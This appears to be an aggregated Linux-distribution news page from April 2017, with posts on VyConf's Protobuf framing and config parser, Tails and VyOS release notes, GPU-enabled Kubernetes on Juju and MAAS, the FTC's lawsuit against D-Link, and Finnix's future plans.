As I already said in the previous post, VyConf uses Protobuf for serialized messages. Protobuf doesn't define any framing, however, so we have to come up with something. The most popular options are delimiters and length headers. The issue with delimiters is that you have to make sure they do not appear in user input, or you risk losing part of the message. Some programs choose to escape delimiters; others rely on unusual sequences, e.g. the backend of OPNsense uses three null bytes for it. Since Protobuf is a binary protocol, no sequence is unusual enough, so length headers look like the best option. VyConf uses 4-byte headers in network order, each followed by a Protobuf message. This is easy enough to implement in any language, so it shouldn't be a problem when writing bindings for other languages.
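The framing is simple enough to sketch in a few lines (a Python illustration, not VyConf's OCaml code; the payload is treated as opaque bytes where a real client would pass a serialized Protobuf message):

```python
import socket
import struct

def send_message(sock, payload: bytes) -> None:
    """Frame a message: 4-byte length header in network (big-endian)
    byte order, followed by the message bytes themselves."""
    sock.sendall(struct.pack("!I", len(payload)) + payload)

def recv_exactly(sock, n: int) -> bytes:
    """Read exactly n bytes, looping because recv() may return less."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-message")
        buf += chunk
    return buf

def recv_message(sock) -> bytes:
    """Read one length-prefixed message and return its payload."""
    (length,) = struct.unpack("!I", recv_exactly(sock, 4))
    return recv_exactly(sock, length)

# Round-trip over a local socket pair
left, right = socket.socketpair()
send_message(left, b"\x0a\x06status")  # stand-in for a serialized request
assert recv_message(right) == b"\x0a\x06status"
```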

The code

There is a single client library that is shared by the non-interactive client and the interactive shell. It will also serve as the OCaml bindings package for VyConf (Python and other languages will need their own bindings, but with Protobuf, most of the code can be autogenerated).

Parser improvements

Inactive and ephemeral nodes

The curly config parser is now complete. It supports the inactive and ephemeral properties. This is what a config with those will look like:

protocols {
  static {
    /* Inserted by a fail2ban-like script */
    #EPHEMERAL route ... {
    }
    /* Disabled by admin */
    #INACTIVE route ... {
    }
  }
}

While I'm not sure whether there are valid use cases for it, nodes can be inactive and ephemeral at the same time. Deactivating an ephemeral node that was created by a script, perhaps? Anyway, since both are part of the config format that the "show" command will produce, we get to support both in the parser too.

Multi nodes

By multi nodes I mean nodes that may have more than one value, such as "address" in interfaces. As you remember, I suggested and implemented a new syntax for such nodes:

interfaces {
  ethernet eth0 {
    address [
      192.0.2.1/24;
      192.0.2.2/24;
    ];
  }
}

However, the parser now supports the original syntax too, that is:

interfaces {
  ethernet eth0 {
    address 192.0.2.1/24;
    address 192.0.2.2/24;
  }
}

I didn't intend to support it originally, but another edge case prompted me to add it. For config read operations to work correctly, every path in the tree must be unique. The high level Config_tree.set function maintains this invariant, but the parser uses lower level primitives that do not, so if a user creates a config with duplicate nodes, e.g. by careless pasting, the config tree that the parser returns will contain them too, and we get to detect such situations and do something about them. Configs with duplicate tag nodes (e.g. "ethernet eth0 { ... } ethernet eth0 { ... }") are rejected as incorrect, since there is no way to recover from that. Multiple non-leaf nodes with distinct children (e.g. "system { host-name vyos; } system { name-server; }") can be merged cleanly, so I've added code that merges them by moving the children of subsequent nodes under the first one and removing the extra nodes afterwards. However, in the raw config there is no real distinction between leaf and non-leaf nodes, so for leaf nodes that code would simply discard all values but the first. I've extended it to also move values into the first node, which amounts to support for the old syntax, except that node comments and inactive/ephemeral properties will be inherited from the first node. Then again, this is how the parser in VyOS 1.x behaves, so nothing is lost.
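A rough sketch of that merging step in Python (the real implementation is OCaml, and the node representation here is deliberately simplified to (name, values, children) tuples):

```python
def merge_duplicates(nodes):
    # nodes: list of (name, values, children) tuples from the raw
    # parse. Duplicates of the same name are folded into the first
    # occurrence, preserving the original order of first appearance.
    merged = {}
    order = []
    for name, values, children in nodes:
        if name not in merged:
            merged[name] = (list(values), list(children))
            order.append(name)
        else:
            first_values, first_children = merged[name]
            first_values.extend(values)      # old multi-node leaf syntax
            first_children.extend(children)  # duplicate non-leaf nodes
    return [(name, *merged[name]) for name in order]
```

In the real parser the same walk would also have to recurse into children and reject duplicate tag nodes instead of merging them, as described above.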

While the show command in VyOS 2.0 will always use the new syntax with curly brackets, the parser will not break the principle of least astonishment for people used to the old one. Also, if we decide to write a migration utility for converting 1.x configs to 2.0, we'll be able to reuse the parser, perhaps after adding semicolons to the old config with a simple regular expression.


Node names and unquoted values can now contain any characters that are not reserved, that is, anything but whitespace, curly braces, square brackets, and semicolons.

What's next?

Next I'm going to work on adding low level config operations (exists/returnValue/...) and set commands so that we can do some real life tests.

There's a bunch of open tasks if you want to join the development:

T254 is about rejecting nodes with reserved characters in their names early, at "set" time. There's a rather nasty bug in VyOS 1.1.7 related to this: you can pass a quoted node name with spaces to set, and if there is no validation rule attached to the node, as is the case with "vpn l2tp remote-access authentication local-users", the node will be created, but it will fail to parse correctly after you save and reload the config. We'll fix it in 1.2.0 of course, but we also need to prevent it from ever appearing in 2.0.
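
Such early validation could look something like this (a hypothetical helper in Python, not VyConf's actual API), using the reserved-character list from the parser section above:

```python
import re

# Reserved characters: whitespace, curly braces, square brackets,
# and semicolons; anything else is allowed in node names.
_RESERVED = re.compile(r"[\s{}\[\];]")

def validate_node_name(name: str) -> None:
    # Reject at "set" time any name that could not round-trip
    # through the curly config parser after save and reload.
    if not name or _RESERVED.search(name):
        raise ValueError("invalid node name: %r" % name)
```

With a check like this attached to the set path itself, the bad node is refused up front instead of being discovered when the saved config fails to parse.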

T255 is about adding the curly config renderer. While we can use the JSON serializer for testing right now, the usual format is also just easier on the eyes, and it's a relatively simple task too.

19 April, 2017 09:19PM by Daniil Baturin

hackergotchi for Tails


Call for testing: 3.0~beta4

You can help Tails! The fourth beta for the upcoming version 3.0 is out. We are very excited and cannot wait to hear what you think about it :)

What's new in 3.0~beta4?

Tails 3.0 will be the first version of Tails based on Debian 9 (Stretch). As such, it upgrades essentially all included software.

Other changes since Tails 3.0~beta3 include:

  • Important security fixes!

  • All changes brought by Tails 2.12.

  • Upgrade to current Debian 9 (Stretch).

  • Many bug fixes in Tails Greeter.

  • Fix the ORCA screen reader.

  • Replace Pidgin's "systray" icon with the guifications plugin.

Technical details of all the changes are listed in the Changelog.

How to test Tails 3.0~beta4?

We will provide security updates for Tails 3.0~beta4, just like we do for stable versions of Tails.

But keep in mind that this is a test image. We tested that it is not broken in obvious ways, but it might still contain undiscovered issues.

But test wildly!

If you find anything that is not working as it should, please report to us on tails-testers@boum.org.

Bonus points if you first check if it is a known issue of this release or a longstanding known issue.

Get Tails 3.0~beta4

An automatic upgrade is available from 3.0~beta2 and 3.0~beta3 to 3.0~beta4.

If you cannot do an automatic upgrade, you can install 3.0~beta4 by following our usual installation instructions, skipping the Download and verify step.

Tails 3.0~beta4 ISO image OpenPGP signature

Known issues in 3.0~beta4

  • The documentation has only been partially updated so far.

  • The graphical interface fails to start on some Intel graphics adapters. If this happens to you:

    1. Add the xorg-driver=intel option in the boot menu.
    2. If this fixes the problem, report to tails-testers@boum.org the output of the following commands:

      lspci -v
      lspci -mn

      … so we get the identifier of your graphics adapter and can have this fix applied automatically in the next Tails 3.0 pre-release.

    3. If this does not fix the problem, try Troubleshooting Mode and report the problem to tails-testers@boum.org. Include the exact model of your Intel graphics adapter.
  • There is no Read-Only feature for the persistent volume anymore; it is not clear yet whether it will be re-introduced in time for Tails 3.0 final (#12093).

  • Open tickets for Tails 3.0~rc1

  • Open tickets for Tails 3.0

  • Longstanding known issues

What's coming up?

We will likely publish the first release candidate for Tails 3.0 around May 19.

Tails 3.0 is scheduled for June 13.

Have a look at our roadmap to see where we are heading.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

19 April, 2017 06:50PM

hackergotchi for VyOS


VyOS 1.2.0 repository re-structuring

In preparation for the new 1.2.0 (jessie-based) beta release, we are re-populating the package repositories. The old repositories are now archived; you can still find them in the /legacy/repos directory on dev.packages.vyos.net

The purpose of this is two-fold. First, the old repo got quite messy, and Debian people (rightfully!) keep reminding us about it, but it would be difficult to do a gradual cleanup. Second, since the CI server has moved, and so did the build hosts, we need to test how well the new procedures are working. And, additionally, it should tell us if we are prepared to restore VyOS from its source should anything happen to the packages.vyos.net server or its contents.

For perhaps a couple of days, there will be no new nightly builds, and you will not be able to build ISOs yourself, unless you change the repo path in ./configure options by hand. Stay tuned.

19 April, 2017 06:31PM by Daniil Baturin

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: How we commoditized GPUs for Kubernetes

[Edit 2017-04-20] A careful reader informed me (thanks for that, HN user puzzle) that it is no longer required to run in privileged mode to access the GPUs in K8s. I have therefore removed a note that previously stated this requirement, and am in the process of updating my Helm charts to remove it from there as well.

Over the last 4 months I have blogged 4 times about the enablement of GPUs in Kubernetes. Each time I did so, I spent several days building and destroying clusters until it was just right, making the experience as fluid as possible for adventurous readers.

It was not the easiest task, as the environments were different (cloud, bare metal) and the hardware was different (g2.xlarge instances have old K20s, p2 instances have K80s, I had a 1060GTX at home but on a consumer grade Intel NUC…). As a result, I also spent several hours supporting people setting up clusters. Usually with success, but I must admit some environments have been challenging.

Thankfully, the team at Canonical in charge of developing the Canonical Distribution of Kubernetes has productized GPU integration and made it so easy to use that it would just be a shame not to talk about it.

And as happiness of course never comes alone, I was lucky enough to be allocated 3 brand new, production grade Pascal P5000 boards by our nVidia friends. I could have installed these in my playful rig to replace the 1060GTX boards, but that would have shown little gratitude for the exceptional gift I received from nVidia. Instead, I decided to go for a full blown “production grade” bare metal cluster, which will allow me to replicate most of the environments customers and partners have. I chose to go for 3x Dell T630 servers, which can be GPU enabled and are very capable machines. I received them a couple of weeks ago, and…

Please don’t mind the cables, I don’t have a rack…

There we are! Ready for some awesomeness?

What it was in the past

If you remember the other posts, the sequence was:

  1. Deploy a “normal” K8s cluster with Juju;
  2. Add a CUDA charm and relate it to the right group of Kubernetes workers;
  3. Connect on each node, and activate privileged containers, and add the experimental-nvidia-gpu tag to the kubelet. Restart kubelet;
  4. Connect on the API Server, add the experimental-nvidia-gpu tag and restart the API server;
  5. Test that the drivers were installed OK and made available in k8s with Juju and Kubernetes commands.

Overall, on top of the Kubernetes installation, with all the scripting in the world, no less than 30 to 45min were lost to perform the specific maintenance for GPU enablement.
It is better than having no GPUs, but it is often too much for the operators of the clusters who want an instant solution.

How is it now?

I am happy to say that the requests of the community have been heard loud and clear. As of Kubernetes 1.6.1, and the matching GA release of the Canonical Distribution of Kubernetes, the new experience is:

  1. Deploy a normal K8s cluster with Juju

Yes, you read that correctly: single-command deployment of a GPU-enabled Kubernetes cluster.

Since 1.6.1, the charms will now:

  • watch for GPU availability every 5 minutes; for clouds like GCE, where GPUs can be added on the fly to instances, this makes sure that no GPU will ever be forgotten;
  • if one or more GPUs are detected on a worker, install the latest and greatest CUDA drivers on the node, then reconfigure and restart the kubelet automagically;
  • the worker then communicates its new state to the master, which in return also reconfigures the API server and accepts GPU workloads;
  • in a mixed cluster where some nodes have GPUs and others don't, only the right nodes will attempt to install CUDA and accept privileged containers.
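
As a rough illustration of the first step (my sketch, not the charm's actual code), detecting a GPU on a worker can be as simple as scanning the PCI device list:

```python
import re
import subprocess

def has_nvidia_gpu(lspci_output: str) -> bool:
    # A worker qualifies for CUDA installation if an NVIDIA device
    # shows up in its PCI listing.
    return bool(re.search(r"\bNVIDIA\b", lspci_output, re.IGNORECASE))

def node_has_nvidia_gpu() -> bool:
    # Run from a periodic check (e.g. every 5 minutes) on each worker,
    # so GPUs hot-added to cloud instances are eventually noticed.
    out = subprocess.run(["lspci"], capture_output=True, text=True).stdout
    return has_nvidia_gpu(out)
```

The interesting part is everything the charm does after a positive result (driver installation, kubelet and API server reconfiguration), which is exactly what you no longer have to script yourself.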

You don’t believe me? Fair enough. Watch me…


For the following, you’ll need:

  • Basic understanding of the Canonical toolbox: Ubuntu, Juju, MAAS…
  • Basic understanding of Kubernetes
  • A little bit of Helm at the end

and for the files, cloning the repo:

git clone https://github.com/madeden/blogposts
cd blogposts/k8s-ethereum

Putting it to the test

In the cloud

Deploying in the cloud is trivial. Once Juju is installed and your credentials are added,

juju bootstrap aws/us-east-1 
juju deploy src/bundles/k8s-1cpu-3gpu-aws.yaml
watch -c juju status --color

Now wait…

Model    Controller     Cloud/Region   Version
default  aws-us-east-1  aws/us-east-1  2.2-beta2

App                    Version  Status       Scale  Charm              Store       Rev  OS      Notes
easyrsa                3.0.1    active           1  easyrsa            jujucharms    8  ubuntu
etcd                   2.3.8    active           1  etcd               jujucharms   29  ubuntu
flannel                0.7.0    active           2  flannel            jujucharms   13  ubuntu
kubernetes-master      1.6.1    waiting          1  kubernetes-master  jujucharms   17  ubuntu  exposed
kubernetes-worker-cpu  1.6.1    active           1  kubernetes-worker  jujucharms   22  ubuntu  exposed
kubernetes-worker-gpu           maintenance      3  kubernetes-worker  jujucharms   22  ubuntu  exposed

Unit                      Workload     Agent      Machine  Public address  Ports           Message
easyrsa/0*                active       idle       0/lxd/0                    Certificate Authority connected.
etcd/0*                   active       idle       0   2379/tcp        Healthy with 1 known peer
kubernetes-master/0*      waiting      idle       0   6443/tcp        Waiting for kube-system pods to start
  flannel/0*              active       idle                         Flannel subnet
kubernetes-worker-cpu/0*  active       idle       1  80/tcp,443/tcp  Kubernetes worker running.
  flannel/1               active       idle                        Flannel subnet
kubernetes-worker-gpu/0   maintenance  executing  2                  (install) Installing CUDA
kubernetes-worker-gpu/1   maintenance  executing  3                   (install) Installing CUDA
kubernetes-worker-gpu/2*  maintenance  executing  4                  (install) Installing CUDA

Machine  State    DNS             Inst id              Series  AZ          Message
0        started   i-0d71d98b872d201f5  xenial  us-east-1a  running
0/lxd/0  started    juju-29e858-0-lxd-0  xenial              Container started
1        started  i-04f2b75f3ab88f842  xenial  us-east-1a  running
2        started  i-0113e8a722778330c  xenial  us-east-1a  running
3        started   i-07c8c81f5e4cad6be  xenial  us-east-1a  running
4        started  i-00ae437291c88210f  xenial  us-east-1a  running

Relation      Provides               Consumes               Type
certificates  easyrsa                etcd                   regular
certificates  easyrsa                kubernetes-master      regular
certificates  easyrsa                kubernetes-worker-cpu  regular
certificates  easyrsa                kubernetes-worker-gpu  regular
cluster       etcd                   etcd                   peer
etcd          etcd                   flannel                regular
etcd          etcd                   kubernetes-master      regular
cni           flannel                kubernetes-master      regular
cni           flannel                kubernetes-worker-cpu  regular
cni           flannel                kubernetes-worker-gpu  regular
cni           kubernetes-master      flannel                subordinate
kube-dns      kubernetes-master      kubernetes-worker-cpu  regular
kube-dns      kubernetes-master      kubernetes-worker-gpu  regular
cni           kubernetes-worker-cpu  flannel                subordinate
cni           kubernetes-worker-gpu  flannel                subordinate

I was able to capture the moment where it is installing CUDA so you can see it… When it’s done:

juju ssh kubernetes-worker-gpu/0 "sudo nvidia-smi"
Tue Apr 18 08:50:23 2017       
| NVIDIA-SMI 375.51                 Driver Version: 375.51                    |
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|   0  Tesla K80           Off  | 0000:00:1E.0     Off |                    0 |
| N/A   52C    P0    67W / 149W |      0MiB / 11439MiB |     98%      Default |
| Processes:                                                       GPU Memory |
|  GPU       PID  Type  Process name                               Usage      |
|  No running processes found                                                 |
Connection to closed.

That’s it, you can see the K80 from the p2.xlarge instance. I didn’t do anything about it, it was completely automated. This is Kubernetes on GPU steroids.


On Bare Metal

Obviously there is a little more to do on Bare Metal, and I will refer you to my previous posts to understand how to set MAAS up & running. This assumes it is already working.

Adding the T630 to MAAS is a breeze. If you didn't change the default iDRAC username and password (root/calvin), the only thing you have to do is connect them to a network (a dedicated management VLAN is preferred, of course), set the IP address, and add them to MAAS with an IPMI power type.

Adding the nodes into MAAS

Then commission the nodes as you would any others. This time, you won't need to press the power button like I had to with the NUC cluster: MAAS will trigger the boot via the IPMI card directly, request a PXE boot, and register the node, all fully automagically. Once that is done, tag them “gpu” to make them easy to recognize.

Details about the T630 in MAAS


juju bootstrap maas
juju deploy src/bundles/k8s-1cpu-3gpu.yaml
watch -c juju status --color

Wait for a few minutes… You will see at some point that the charm is now installing CUDA drivers. At the end,

Model    Controller  Cloud/Region  Version
default  k8s         maas

App                    Version  Status  Scale  Charm              Store       Rev  OS      Notes
easyrsa                3.0.1    active      1  easyrsa            jujucharms    8  ubuntu
etcd                   2.3.8    active      1  etcd               jujucharms   29  ubuntu
flannel                0.7.0    active      5  flannel            jujucharms   13  ubuntu
kubernetes-master      1.6.1    active      1  kubernetes-master  jujucharms   17  ubuntu  exposed
kubernetes-worker-cpu  1.6.1    active      1  kubernetes-worker  jujucharms   22  ubuntu  exposed
kubernetes-worker-gpu  1.6.1    active      3  kubernetes-worker  jujucharms   22  ubuntu  exposed

Unit                      Workload  Agent  Machine  Public address  Ports           Message
easyrsa/0*                active    idle   0/lxd/0                      Certificate Authority connected.
etcd/0*                   active    idle   0      2379/tcp        Healthy with 1 known peer
kubernetes-master/0*      active    idle   0      6443/tcp        Kubernetes master running.
  flannel/1               active    idle                        Flannel subnet
kubernetes-worker-cpu/0*  active    idle   1      80/tcp,443/tcp  Kubernetes worker running.
  flannel/0*              active    idle                        Flannel subnet
kubernetes-worker-gpu/0   active    idle   2      80/tcp,443/tcp  Kubernetes worker running.
  flannel/2               active    idle                        Flannel subnet
kubernetes-worker-gpu/1   active    idle   3      80/tcp,443/tcp  Kubernetes worker running.
  flannel/4               active    idle                        Flannel subnet
kubernetes-worker-gpu/2*  active    idle   4      80/tcp,443/tcp  Kubernetes worker running.
  flannel/3               active    idle                        Flannel subnet

Machine  State    DNS         Inst id              Series  AZ
0        started  br68gs               xenial  default
0/lxd/0  started  juju-5a80fa-0-lxd-0  xenial
1        started  qkrh4t               xenial  default
2        started  4y74eg               xenial  default
3        started  w3pgw7               xenial  default
4        started  se8wy7               xenial  default

Relation      Provides               Consumes               Type
certificates  easyrsa                etcd                   regular
certificates  easyrsa                kubernetes-master      regular
certificates  easyrsa                kubernetes-worker-cpu  regular
certificates  easyrsa                kubernetes-worker-gpu  regular
cluster       etcd                   etcd                   peer
etcd          etcd                   flannel                regular
etcd          etcd                   kubernetes-master      regular
cni           flannel                kubernetes-master      regular
cni           flannel                kubernetes-worker-cpu  regular
cni           flannel                kubernetes-worker-gpu  regular
cni           kubernetes-master      flannel                subordinate
kube-dns      kubernetes-master      kubernetes-worker-cpu  regular
kube-dns      kubernetes-master      kubernetes-worker-gpu  regular
cni           kubernetes-worker-cpu  flannel                subordinate
cni           kubernetes-worker-gpu  flannel                subordinate

And now:

juju ssh kubernetes-worker-gpu/0 "sudo nvidia-smi"
Tue Apr 18 06:08:35 2017       
| NVIDIA-SMI 375.51                 Driver Version: 375.51                    |
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|   0  GeForce GTX 106...  Off  | 0000:04:00.0     Off |                  N/A |
| 28%   37C    P0    28W / 120W |      0MiB /  6072MiB |      0%      Default |
|   1  Quadro P5000        Off  | 0000:83:00.0     Off |                  Off |
|  0%   43C    P0    39W / 180W |      0MiB / 16273MiB |      2%      Default |
| Processes:                                                       GPU Memory |
|  GPU       PID  Type  Process name                               Usage      |
|  No running processes found                                                 |

That’s it, my 2 cards are in there: 1060GTX and P5000. Again, no user interaction. How awesome is this?

Note that the interesting aspect is not only that GPU enablement is automated, but also that the bundle files (the yaml content) are essentially the same, apart from the machine constraints we set.

Having some fun with GPUs

If you follow me you know I’ve been playing with Tensorflow, so that would be a use case, but I actually wanted to get some raw fun with them! One of my readers mentioned bitcoin mining once, so I decided to go for it.

I made a quick and dirty Helm Chart for an Ethereum Miner, along with a simple rig monitoring system called ethmon.

This chart lets you configure how many nodes and how many GPUs per node you want to use. Then you can also tweak the miner. For now, it only works in ETH-only mode. Don't forget to create a values.yaml file to:

  • add your own wallet (if you keep the default you'll actually pay me, which is fine 🙂 but not necessarily your purpose);
  • update the ingress xip.io endpoint to match the public IP of one of your workers, or use your own DNS;
  • adjust the number of workers and GPUs per node.


cd ~
git clone https://github.com/madeden/charts.git
cd charts
helm init
helm install claymore --name claymore --values /path/to/yourvalues.yaml

By default, you'll get 3 worker nodes with 2 GPUs each (this is sized for my rig at home).

KubeUI with the miners deployed

Monitoring interface (ethmon)

You can also track it here with nice graphs.

What did I learn from it? Well,

  • I really need to work on my per-card tuning here! The P5000 and the 1060GTX show the same performance, which also matches my Quadro M4000. This is not right (or there is a cap somewhere). But I'm a newbie; I'll get better.
  • It's probably not worth it money-wise. This would make me less than $100/month with this cluster, less than the electricity bill to run it.
  • There is a LOT of room for Monero mining on the CPU! I run at less than a core for the 6 workers.
  • I’ll probably update it to run less workers, but with all the GPUs allocated to them.
  • But it was very fun to make. And now apparently I need to do “monero”, which is supposedly ASIC-resistant and should be more profitable. Stay tuned 😉


I recognize that 3 months ago, running Kubernetes with GPUs wasn't a trivial job. It was possible, but you needed to really want it.

Today, if you are looking for CUDA workloads, I challenge you to find anything easier than the Canonical Distribution of Kubernetes to run that, on Bare Metal or in the cloud. It is literally so trivial to make it work that it’s boring. Exactly what you want from infrastructure.

GPUs are the new normal. Get used to it.

So, let me know of your use cases, and I will put this cluster to work on something a little more useful for mankind than a couple of ETH!

I am always happy to do some skunk work, and if you combine GPUs and Kubernetes, you’ll just be targeting my 2 favorite things in the compute world. Shoot me a message @SaMnCo_23!

19 April, 2017 01:56PM

hackergotchi for Tails


Tails 2.12 is out

This release fixes many security issues and users should upgrade as soon as possible.


New features

  • We installed again GNOME Sound Recorder to provide a very simple application for recording sound in addition to the more complex Audacity. Sound clips recorded using GNOME Sound Recorder are saved to the Recordings folder.

Upgrades and changes

  • We removed I2P, an alternative anonymity network, because we unfortunately have failed to find a developer to maintain I2P in Tails. Maintaining software like I2P well-integrated in Tails takes time and effort and our team is too busy with other priorities.

  • Upgrade Linux to 4.9.13. This should improve the support for newer hardware (graphics, Wi-Fi, etc.).

For more details, read our changelog.

Known issues

See the list of long-standing issues.

Get Tails 2.12

What's coming up?

Tails 3.0 is scheduled for June 13th.

Have a look at our roadmap to see where we are heading.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

19 April, 2017 10:34AM

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: FTC & D-Link

This is a guest post by Peter Kirwan, technology journalist. If you would like to contribute a post, please contact ubuntu-devices@canonical.com

Anyone who doubts that governments are closing in on hardware vendors in a bid to shut down IoT security vulnerabilities needs to catch up with the Federal Trade Commission’s recent lawsuit against D-Link.

The FTC’s 14-page legal complaint accuses the Taiwan-based company of putting consumers at risk by inadequately securing routers and IP cameras.

In this respect, this FTC lawsuit looks much the same as previous ones that held tech vendors to account for security practices that failed to live up to marketing rhetoric.

The difference this time around is that the FTC’s lawsuit includes a pointed reference to reports that D-Link’s devices were compromised by the same kind of IoT botnets that took down US-based Dyn and European service providers in late 2016.

In one way, this isn’t so surprising. In the wake of these recent attacks, the question of how we secure vast numbers of connected devices has rapidly moved up the agenda. (You can read our white paper on this, here.) In December 2016, for example, after analysing the sources of the Dyn attack, Allison Nixon, director of research at the security firm Flashpoint, pointed to the need for new approaches:

“We must look at this problem with fresh eyes and a sober mind, and ask ourselves what the Internet is going to look like when the professionals muscle out the amateurs and take control of extremely large attack power that already threatens our largest networks.”

In recent years, the way in which the FTC interprets its responsibility to protect US consumers from deceptive practices has evolved. It has already established itself as a guardian of digital privacy. Now, it seems, the FTC may be interested in preventing the disruption that accompanies large-scale DDoS attacks.

D-Link, which describes its security policies as “robust”, has pledged to fight the FTC's case in court. The company argues that the FTC needs to prove that “actual consumers suffered or are likely to suffer actual substantial injuries”. To fight its corner, D-Link has hired a public interest law firm which accuses the FTC of “unchecked regulatory overreach”.

By contrast, the FTC believes it simply needs to demonstrate that D-Link has misled customers by claiming that its products are secure, while failing to take “reasonable steps” to secure its devices. The FTC claims that this is “unfair or deceptive” under US law.

But who defines what is “reasonable steps” when it comes to the security of connected devices?

The FTC’s lawsuit argues that D-Link failed to protect against flaws which the Open Web Application Security Project (OWASP) “has ranked among the most critical and widespread application vulnerabilities since at least 2007”.

The FTC might just as easily have pointed to its own guidelines, published over two years ago. In the words of Stephen Cobb, senior security researcher at the security firm ESET: “Companies failing to heed the agency’s IoT guidance. . . should not be surprised if they come under scrutiny. Bear in mind that any consumer or consumer advocacy group can request an FTC investigation.”

The FTC has already established that consumers have a right to expect that vendors will take reasonable steps to ensure that their devices are not used to spy on them or steal their identity.

If the FTC succeeds against D-Link, consumers may also think it reasonable that their devices should be protected against botnets, too.

Of course, any successful action by the FTC will only be relevant to IoT devices sold and installed in the US. But the threat of an FTC investigation certainly will get the attention of hardware vendors who operate internationally and need to convince consumers that they can be trusted on security.

19 April, 2017 09:00AM

April 18, 2017

hackergotchi for Finnix


The future of Finnix

Finnix has a unique place in history. The project was started in 1999, with its first public release in March 2000, making it one of the oldest LiveCDs (predated by DemoLinux and immediately preceded by the Linuxcare Bootable Toolbox). Indeed, Finnix even predated the term “LiveCD”. It’s currently the oldest actively maintained LiveCD distribution.

However, you may notice that the last release was in June 2015, in contrast to the usual release frequency of once or twice per year. I just wanted to let Finnix users know that the project is still expected to be updated, albeit with some changes, hopefully for the better.

EFI support: In contrast to a few years ago, an increasing number of (mostly mass consumer) computers these days are EFI only, and do not have a legacy BIOS bootloader. Finnix currently uses isolinux for the x86 bootloader, which precludes EFI support. I am planning on switching to the GRUB bootloader which will allow for EFI boot support.

AMD64 userland and single kernel: Finnix’s main x86 ISO currently contains a 32-bit userland and two kernels: a 32-bit and a 64-bit kernel. This allows for the most flexibility when working on x86 systems; 32-bit CPUs/userlands are supported, and 64-bit userlands can be chrooted into by booting the 64-bit kernel, even though the CD userland is 32-bit.

However, modern kernels are very large; and two built-in kernels take up a good majority of the space on a Finnix CD. AMD64 CPUs have been in consumer usage for 13 years now, and for most tasks, a single AMD64 kernel and 64-bit userland will be sufficient. For working with AMD64 systems with 32-bit userlands (which are still a common minority), this will still be supported.

Of course, this means future main Finnix releases will not support CPUs released before 2004 (and even some 32-bit CPUs released after that), but for such “classic” systems, older Finnix releases will still be usable for most tasks. In addition, Project NEALE will still be capable of building Finnix CDs with a 32-bit kernel and userland. And indeed, NEALE is already capable of building pure-AMD64 ISOs and has been for years, so this is not much of a change from a development perspective.

Upstream Debian kernels: Since 2005, Finnix has used kernels based on Debian, but modified out of necessity. This was usually to add support for code needed for an efficient LiveCD experience which had not been upstreamed (cloop, then SquashFS; UnionFS, then AUFS, then OverlayFS). As of Finnix 111, the main requirements are SquashFS and OverlayFS, both of which are now upstreamed into the vanilla kernel, so there is no technical need for patched kernels.

Finnix still uses modified kernels, mostly to remove modules which are not needed on a text-mode LiveCD (such as sound and video modules) to save space. However, creating and packaging modified kernels is a time- and labor-intensive process, and with the space saved by shipping only one kernel on the CD, removing modules to save space is no longer a great concern. As such, future Finnix releases will use unmodified Debian-based kernels.

(Sadly, this also means the end of the custom Finnix kernel CPU logos displayed on initial boot.)

systemd init: Finnix currently uses runit as its init system, which was small and let me sidestep sysvinit and Debian’s distro rc assumptions. (Prior to runit, Finnix build procedures involved cutting out most of the sysvinit rc functionality and putting Finnix replacements in.) But it’s very much a manual process, and as nearly all distros have transitioned or are transitioning to systemd, now would be a good time to do the same.

systemd is large and has a reputation of wanting to consume everything, but as I’ve found out with a few days of research and testing, it’s actually rather conducive to distribution management. For example, one thing Finnix needs to be able to do is attempt DHCP on all network interfaces, but not block on it (getting to the command prompt quickly is the most important consideration). I was able to quickly write a service which depended on systemd-udev-settle.service, ensuring all boot interfaces were available, write interfaces.d definitions, and trigger starts of ifup@$INT.service without blocking the getty process. It even has the ability to pivot-root back to an initramfs at the end of system shutdown, something I previously had to patch manually into runit.
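
As an illustrative sketch only (the unit name, paths and interface glob here are my guesses, not Finnix's actual files), a non-blocking DHCP-on-all-interfaces unit along those lines might look like:

```ini
# finnix-dhcp.service (hypothetical name) -- attempt DHCP everywhere,
# but never hold up the getty / command prompt.
[Unit]
Description=Attempt DHCP on all detected network interfaces
# Wait for udev to settle so every boot-time interface is visible.
Wants=systemd-udev-settle.service
After=systemd-udev-settle.service

[Service]
Type=oneshot
# systemctl --no-block queues the ifup@<iface> jobs without waiting
# for DHCP leases, so boot continues to the prompt immediately.
ExecStart=/bin/sh -c 'for i in /sys/class/net/*; do \
    n=$(basename "$i"); [ "$n" = lo ] && continue; \
    systemctl start --no-block "ifup@$n.service"; done'

[Install]
WantedBy=multi-user.target
```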

Size bloat: Finnix’s main stated goal is to be a small – but useful – utility LiveCD. To keep the size down and remain a quick download, a maximum size target has always been set. This was originally 100MB, and then for years the stated target was under 185MB – the size of a Mini CD. (This was a mostly arbitrary designation, as Mini CDs were never widely popular.)

Finnix releases have always been small, but have included a lot of semi-manual optimization to keep the size down. For example, the mastering process uses a trick: decompress all .gz files, then “recompress” them at gzip level 0 (which essentially adds a small header to the uncompressed file). This sounds counterintuitive, but it allows the XZ-compressed root filesystem to compress that data much more efficiently later on.
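
As a rough illustration (a simplified sketch, not Finnix's actual mastering code), the trick boils down to:

```python
import gzip
import pathlib

def recompress_gz_level0(root):
    """Rewrite every .gz file under root as a level-0 (stored) gzip member.

    The files remain valid gzip data and decompress to identical bytes,
    but since the payload is no longer deflate-compressed, the later XZ
    pass over the whole root filesystem can squeeze it much harder.
    """
    for path in pathlib.Path(root).rglob("*.gz"):
        data = gzip.decompress(path.read_bytes())
        path.write_bytes(gzip.compress(data, compresslevel=0))
```

Each "recompressed" file is actually slightly larger than the raw data, but XZ then sees the uncompressed bytes instead of incompressible deflate output.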

In the interest of easier maintenance and to accommodate natural upstream size growth, the new target is to keep Finnix releases under 300MB. This is unlikely to be approached any time soon – Finnix 111’s x86 CD is 160MB, and the removal of the second kernel mentioned above will allow for size concessions in other places – but it’s a good goal to allow for future expansion.

